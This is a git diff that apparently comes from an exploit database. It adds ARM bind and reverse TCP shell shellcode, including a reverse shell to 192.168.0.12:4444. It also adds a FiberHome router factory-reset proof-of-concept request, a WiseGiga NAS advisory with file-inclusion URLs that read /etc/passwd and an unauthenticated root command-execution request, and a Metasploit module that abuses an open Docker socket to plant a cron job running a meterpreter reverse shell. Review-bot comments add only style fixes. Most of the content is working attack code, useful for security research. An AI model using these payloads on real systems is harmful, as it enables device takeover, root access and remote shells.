diff --git a/files.csv b/files.csv
index 38719c41b..062320666 100644
--- a/files.csv
+++ b/files.csv
@@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
 42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
 42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
 42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
+42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
 42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
+42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
+42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
 42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
+42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
+42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0
diff --git a/platforms/arm/shellcode/42646.c b/platforms/arm/shellcode/42646.c
new file mode 100755
index 000000000..58d690e24
--- /dev/null
+++ b/platforms/arm/shellcode/42646.c
@@ -0,0 +1,89 @@ +/* + +################################## +# Andrea Sindoni - @invictus1306 # +################################## + +This schellcode is part of my episodes: +- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ + +Enviroment: Raspberry pi 3 + +Default settings for port:4444 + +@.syntax unified +.global _start +_start: + + mov r1, #0x5C @ r1=0x5c + mov r5, #0x11 @ r5=0x11 + mov r1, r1, lsl #24 @ r1=0x5c000000 + add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me + add r1, #2 @ r1=0x5c110002 - sin_family+sin_port + sub r2, r2, r2 @ sin_addr + push {r1, r2} @ push into the stack r1 and r2 + mov r1, sp @ save pointer to sockaddr_in struct + mov r2, #0x10 @ addrlen + mov r0, r6 @ mov sockfd into r0 + ldr r7, =#282 @ bind syscall + swi 0 + + @ listen for incoming connections via SYS_LISTEN + @ int listen(int sockfd, int backlog); + + mov r0, r6 @ mov sockfd into r0 + mov r1, #1 @ backlog=1 + ldr r7, =#284 @ listen syscall + swi 0 + + @ Accept connections + @ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) + + mov r0, r6 @ mov sockfd into r0 + sub r1, r1, r1 @ addr=0 + sub r2, r2, r2 @ addrlen=0 + ldr r7, =#285 @ accept syscall + swi 0 + + @ Redirect stdin, stdout and stderr via dup2 + + mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2) + loop: + mov r7, #63 @ dup2 syscall + swi 0 + sub r1, r1, #1 @ decrement counter + cmp r1, #-1 @ compare r1 with -1 + bne loop @ if the result is not equal jmp to loop + + @ int execve(const char *filename, char *const argv[],char *const envp[]); + mov r0, pc + add r0, #32 + sub r2, r2, r2 + push {r0, r2} + mov r1, sp + mov r7, #11 + swi 0 + +_exit: + mov r0, #0 + mov r7, #1 + swi 0 @ exit(0) + +.asciz "/bin/sh" + +Assemble and link it: +as -o bind.o bind.s +ld -o bind bind.o +*/ + +#include + +char 
*code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00"; + +int main(void) { + + (*(void(*)()) code)(); + + return 0; + +} diff --git a/platforms/arm/shellcode/42647.c b/platforms/arm/shellcode/42647.c new file mode 100755 index 000000000..06bb38aeb --- /dev/null +++ b/platforms/arm/shellcode/42647.c 
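Review bot: The `#include` directive just before the `char *code` definition names no header, here and again in 42647.c, so the file as shown would not get past the preprocessor. This reads like an angle-bracketed header name dropped when the page was rendered rather than a defect in the submitted file, so it is worth confirming against the raw source before touching it; if it really is empty, nothing in the C wrapper uses the standard library and the line can simply be dropped, or restored with whatever header the author intended. The header comment of both files also misspells "shellcode" and "Environment" (`This schellcode is part of my episodes`, `Enviroment: Raspberry pi 3`), which is worth fixing since the comment is the only documentation the files carry.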
@@ -0,0 +1,71 @@ +/* + +################################## +# Andrea Sindoni - @invictus1306 # +################################## + +This schellcode is part of my episodes: +- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ + +Enviroment: Raspberry pi 3 + +Default settings for port:4444 ip:192.168.0.12 + +.global _start +_start: + + mov r1, #0x5C @ r1=0x5c + mov r5, #0x11 @ r5=0x11 + mov r1, r1, lsl #24 @ r1=0x5c000000 + add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me + add r1, #2 @ r1=0x5c110002 - sin_family+sin_port + ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me + push {r1, r2} @ push into the stack r1 and r2 + mov r1, sp @ save pointer to sockaddr_in struct + + mov r2, #0x10 @ addrlen + mov r0, r6 @ mov sockfd into r0 + ldr r7, =#283 @ connect syscall + swi 0 + + @ Redirect stdin, stdout and stderr via dup2 + mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2) + loop: + mov r0, r6 @ mov sockfd into r0 + mov r7, #63 @ dup2 syscall + swi 0 + sub r1, r1, #1 @ decrement counter + cmp r1, #-1 @ compare r1 with -1 + bne loop @ if the result is not equal jmp to loop + + @ int execve(const char *filename, char *const argv[],char *const envp[]); + + mov r0, pc + add r0, #32 + sub r2, r2, r2 + push {r0, r2} + mov r1, sp + mov r7, #11 + swi 0 + +_exit: + mov r0, #0 + mov r7, #1 + swi 0 @ exit(0) + +shell: .asciz "/bin/sh" + + +Assemble and link it: +as -o reverse_shell.o reverse_shell.s +ld -o reverse_shell reverse_shell.o +*/ + +#include + +char *code= 
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00"; + +int main(void) { + (*(void(*)()) code)(); + return 0; +} diff --git a/platforms/hardware/webapps/42649.txt b/platforms/hardware/webapps/42649.txt new file mode 100755 index 000000000..dbf8f916b --- /dev/null +++ b/platforms/hardware/webapps/42649.txt 
@@ -0,0 +1,135 @@ +Title: +==== + +FiberHome Unauthenticated ADSL Router Factory Reset. + +Credit: +====== + +Name: Ibad Shah +Twitter: @BeeFaauBee09 +Website: beefaaubee09.github.io + + +CVE: +===== + +CVE-2017-14147 + +Date: +==== + +05-09-2017 (dd/mm/yyyy) + +About FiberHome: +====== + +FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world. + +Products & Services: +Wireless 3G/4G broadband devices +Custom engineered technologies +Broadband devices + +URL : http://www.fiberhomegroup.com/ + + +Description: +======= + +This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. + + + +Affected Device Model: +============= + +FiberHome ADSL AN1020-25 + + +Exploitation-Technique: +=================== + +Remote + + +Details: +======= + +Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials. 
+ +1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147 + +Vulnerable restoreinfo.cgi + + + +Proof Of Concept: +================ + +PoC : + +GET /restoreinfo.cgi HTTP/1.1 +Host: 192.168.1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Connection: close + + +HTTP/1.1 200 Ok +Server: micro_httpd +Cache-Control: no-cache +Date: Sat, 01 Jan 2000 00:12:39 GMT +Content-Type: text/html +Connection: close + + + + + + + + + + +
+DSL Router Restore

+The DSL Router configuration has been restored to default settings and the +router is rebooting.

+Close the DSL Router Configuration window and wait for 2 minutes before +reopening your web browser. If necessary, reconfigure your PC's IP address to +match your new configuration. +
+ + + + + +Credits: +======= + +Ibad Shah, Taimooor Zafar, Owais Mehtab diff --git a/platforms/hardware/webapps/42651.txt b/platforms/hardware/webapps/42651.txt new file mode 100755 index 000000000..e7af53736 --- /dev/null +++ b/platforms/hardware/webapps/42651.txt 
@@ -0,0 +1,171 @@ +Source: https://blogs.securiteam.com/index.php/archives/3402 + +Vulnerabilities summary +The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices. + +WiseGiga is a Korean company selling NAS products. + +The vulnerabilities found in WiseGiga NAS are: + +Pre-Authentication Local File Inclusion (4 different vulnerabilities) +Post-Authentication Local File Inclusion +Remote Command Execution as root +Remote Command Execution as root with CSRF +Info Leak +Default accounts + + +Credit +An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program + + +Vendor response +We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. + + +Vulnerabilities details + +Pre-Authentication Local File Inclusion +User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords). + +By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities: + +/webfolder/download_file1.php +down_data.php +download_file.php +mobile/download_file1.php + + +Proof of Concept +http://IP/webfolder/download_file1.php?filename=/etc/passwd +http://IP/down_data.php?filename=/etc/passwd +http://IP/download_file.php?filename=base64(/etc/passwd) +http://IP/mobile/download_file1.php?filename=base64(/etc/passwd) + +Post-Authentication Local File Inclusion +User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords). + +By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability. 
+ + +Proof of Concept +http://IP//mobile/download_file2.php?filename=base64(/etc/passwd) + + +Remote Command Execution as root +The WiseGiga NAS firmware contain pre.php files in the different directories. + +For example: +/app_data/apache/htdocs/auto/pre.php +/app_data/apache/htdocs/admin/iframe/pre.php +/app_data/apache/htdocs/admin/pre.php +/app_data/apache/htdocs/mobile/pre.php +/app_data/apache/htdocs/wiseapp/config/pre.php +/app_data/apache/htdocs/pre.php +/home/htdocs/webfolder/pre.php +/ub/update/init/pre.php +/tmp/home/root/htdocs/auto/pre.php +/tmp/home/root/htdocs/pre.php + + +A “standard” pre.php contains: + + 181 [...] + 182 function auth() + 183 { + 184 global $memberid; + 185 session_start(); + 186 //echo $memberid; + 187 if($memberid=="root") + 188 { + 189 // print<<<__DATA_OF_HTML__ + 190 // + 193 //__DATA_OF_HTML__; + 194 } + 195 else + 196 { + 197 print<<<__DATA_OF_HTML__ + 198 + 204 __DATA_OF_HTML__; + 205 } + 206 + 207 } + + +Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request: + +GET /webpage[...]?memberid=root&[...] HTTP/1.0 + + +The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen(): + +23 function root_exec_cmd($cmd) +24 { +25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w"); +26 fwrite($tmpfile,$cmd); +27 fclose($tmpfile); +28 popen("/tmp/ramdisk/ramush","r"); +29 } + +By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands + +The WiseGiga NAS run’s the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root. + + +Proof of Concept +By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function: + +178 if($cmd == "add") +179 { +180 add_system(); +181 } + +The add_system() function uses global for $group_name and $user_data. 
+ +Then it will pass the user controlled input and will run it as root: + +145 function add_system() +146 { +147 global $group_name,$user_data; +148 +149 if(add_conf()==1) +150 { +151 //==================================================================================== +152 root_exec_cmd("addgroup $group_name"); + + +An attacker can get unauthenticated RCE as root by sending the following request: + +http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a + +The file /tmp/a will contain: + +uid=0(root) gid=48(apache) groups=48(apache) + + +Remote Command Execution as root with CSRF +There is no CSRF protection in WiseGiga NAS. + +An attacker can force the execution of a command as root when the victim visits the malicious website. + + +Proof of Concept +Once the victim visit the attacker’s website with the following code, the attacker can execute arbitrary commands. + + + + +InfoLeak +accessing http://IP/webfolder/config/config.php will disclose the PHP configuration. + + +Default accounts +Username: guest +Password: guest09#$ \ No newline at end of file diff --git a/platforms/php/webapps/42648.html b/platforms/php/webapps/42648.html new file mode 100755 index 000000000..7471fbb5c --- /dev/null +++ b/platforms/php/webapps/42648.html @@ -0,0 +1,35 @@ + + + + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/platforms/python/remote/42650.rb b/platforms/python/remote/42650.rb new file mode 100755 index 000000000..7519fa8c8 --- /dev/null +++ b/platforms/python/remote/42650.rb 
@@ -0,0 +1,207 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit', + 'Description' => %q{ + Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp + with tls but without tls-auth), an attacker can create a Docker + container with the '/' path mounted with read/write permissions on the + host server that is running the Docker container. As the Docker + container executes command as uid 0 it is honored by the host operating + system allowing the attacker to edit/create files owned by root. This + exploit abuses this to creates a cron job in the '/etc/cron.d/' path of + the host server. + + The Docker image should exist on the target system or be a valid image + from hub.docker.com. 
+ }, + 'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'], + ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] + ], + 'DisclosureDate' => 'Jul 25, 2017', + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + }] + ], + 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(2375), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']) + ] + ) + end + + def check_image(image_id) + vprint_status("Check if images exist on the target host") + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('images', 'json') + ) + return unless res and res.code == 200 and res.body.include? image_id + + res + end + + def pull_image(image_id) + print_status("Trying to pulling image from docker registry, this may take a while") + res = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + ) + return unless res.code == 200 + + res + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? 
+ + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " + command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + + command + end + + def make_container(mnt_path, cron_path, payload_path) + vprint_status('Setting container json request variables') + { + 'Image' => datastore['DOCKERIMAGE'], + 'Cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'Entrypoint' => %w[/bin/sh -c], + 'HostConfig' => { + 'Binds' => [ + '/:' + mnt_path + ] + } + } + end + + def del_container(container_id) + send_request_raw( + { + 'method' => 'DELETE', + 'uri' => normalize_uri('containers', container_id) + }, + 1 # timeout + ) + end + + def check + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('containers', 'json'), + 'headers' => { 'Accept' => 'application/json' } + ) + + if res.nil? + print_error('Failed to connect to the target') + return Exploit::CheckCode::Unknown + end + + if res and res.code == 200 and res.headers['Server'].include? 'Docker' + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + # check if target is vulnerable + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::Unknown, 'Failed to connect to the target') + end + + # check if image is not available, pull it or fail out + image_id = datastore['DOCKERIMAGE'] + if check_image(image_id).nil? + fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil? 
+ end + + # create required information to create json container information. + cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id + + # create container + res_create = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', 'create?name=' + container_id), + 'headers' => { 'Content-Type' => 'application/json' }, + 'data' => make_container(mnt_path, cron_path, payload_path).to_json + ) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 + + print_status("The docker container is created, waiting for deploy") + register_files_for_cleanup(cron_path, payload_path) + + # start container + send_request_raw( + { + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'start') + }, + 1 # timeout + ) + + # wait until container stopped + vprint_status("Waiting until the docker container stopped") + res_wait = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'wait'), + 'headers' => { 'Accept' => 'application/json' } + ) + + # delete container + deleted_container = false + if res_wait.code == 200 + vprint_status("The docker container has been stopped, now trying to remove it") + del_container(container_id) + deleted_container = true + end + + # if container does not deploy, remove it and fail out + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container failed to deploy") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end \ No newline at end of file
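Review bot: `check_image` and `check` use the low-precedence `and` (`return unless res and res.code == 200 and res.body.include? image_id`, `if res and res.code == 200 and res.headers['Server'].include? 'Docker'`) while `exploit` uses `&&` for the same kind of guard (`unless res_create && res_create.code == 201`), so the module mixes two operator styles for one purpose. Both expressions parse as intended, but `and` combined with an unparenthesized method argument is easy to misread; `return unless res && res.code == 200 && res.body.include?(image_id)` and `if res && res.code == 200 && res.headers['Server'].include?('Docker')` keep one style across the file and match the framework's usual convention. The Description text also has a grammar slip worth correcting, `This exploit abuses this to creates a cron job` should read `This exploit abuses this to create a cron job`.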